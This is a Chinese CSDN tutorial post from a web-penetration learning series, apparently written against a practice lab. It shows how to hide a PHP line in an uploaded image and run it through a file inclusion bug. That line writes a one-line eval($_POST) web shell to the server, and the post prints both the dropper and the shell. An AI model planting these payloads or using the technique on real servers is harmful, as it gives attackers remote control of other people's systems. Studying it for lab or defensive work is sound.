图片木马---web渗透学习

本文介绍了如何结合文件包含漏洞与文件上传漏洞,穿透高安全级别的限制。通过在图片中嵌入PHP代码,然后利用文件包含访问,生成可执行的shell文件,从而获取服务器权限。同时讨论了数据包抓包分析以及可能的WAF规避策略,并提出了安全防护建议,如动态检查文件内容以防止恶意代码执行。
摘要由CSDN通过智能技术生成

在《文件上传漏洞—Web渗透学习》一文中讲到在高安全级别(有较强安全意识的开发人员)中,开放人员定义了用户上传文件的扩展名,只有文件扩展名是jpg、JPG、jpeg、JPEG等文件才允许上传。通过代理服务器等方法无法对其进行渗透。
通过文件包含漏洞的渗透方法和文件上传漏洞的方法结合,可以成功渗透文件上传漏洞中的高安全级别。
原理:
我们在高安全级别中真实的长传一张图片,但在通过图片编辑软件,将php语句添加到该图片中。
php语句如下:

<?fputs(fopen("shell50.php","w"),'<?php eval($_POST[1]);?>')?> 

然后通过文件包含来访问该图片,使该语句得到执行,从而生成shell50.php文件,文件内容为:

<?php eval($_POST['1']);?>

上传图片:
在这里插入图片描述通过文件包含访问该图片(显示乱码表示图片上传成功):
在这里插入图片描述访问的实质是通过include函数对执行上传的图片进行执行,从而生成shell50

  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值